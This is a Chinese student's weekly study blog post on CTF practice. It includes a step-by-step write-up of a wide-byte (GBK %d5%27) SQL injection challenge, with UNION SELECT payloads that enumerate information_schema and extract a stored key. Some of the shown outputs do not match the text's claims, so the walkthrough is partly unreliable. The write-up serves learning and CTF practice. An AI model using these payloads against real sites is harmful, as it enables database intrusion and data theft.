Secat's Blog

学习·记录

这世界变化快的真是铃儿响叮当


第六周总结

第六周总结

本周学习内容

  1. 本打算先看《web深度剖析》的,但是看了一上午书发现只看书并没有什么用,还是得实践的。。。然后开始了南邮ctf之旅,做了大约12个web题,有些是自己试出来的,还有一些想不出来看的百度的wp。还做了一些学校ctf上的几个web题,变量覆盖那个题最后没拿到flag就是因为最后一步的base混合解码(抓紧学python)
  2. 所做的除注入题以外的web题的最深感悟:拿到题先看源代码,源代码找不到什么思路就用burpsuite抓点东西看,大部分题都是这个套路。嗯。 3.终于开始看python,安装python,跟着网站学了一些基础的操作,试着写了一些简单的例子。。。

    注入题解1:

    网址为

    http://103.238.227.13:10083/
    

    首先,什么是宽字节 GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节

http://103.238.227.13:10083/?id=-1%d5' 
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1誠'' LIMIT 1' at line 1

宽字节注入

http://103.238.227.13:10083/?id=-1%d5%27 order by 1 
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1
http://103.238.227.13:10083/?id=-1%d5%27 order by 2
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1

order by 判断有多少列

http://103.238.227.13:10083/?id=-1%d5%27 order by 3
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1

1和2都可以,但是到3的时候不可以,说明数据库有两列

http://103.238.227.13:10083/?id=-1%d5%27 union select database(),null --+  

查询数据库正常,返回sql5

http://103.238.227.13:10083/?id=-1%d5%27 union select 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() --+

查询所有字段名

http://103.238.227.13:10083/?id=-1%d5%27 union select 1,group_concat(id,0x7e,string) FROM .key --+

查询字段内容 题目要求查询id=1的string字段,于是string内容为

54f3320dc261f313ba712eb3f13a1f6d

THANKS

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码支持

^_^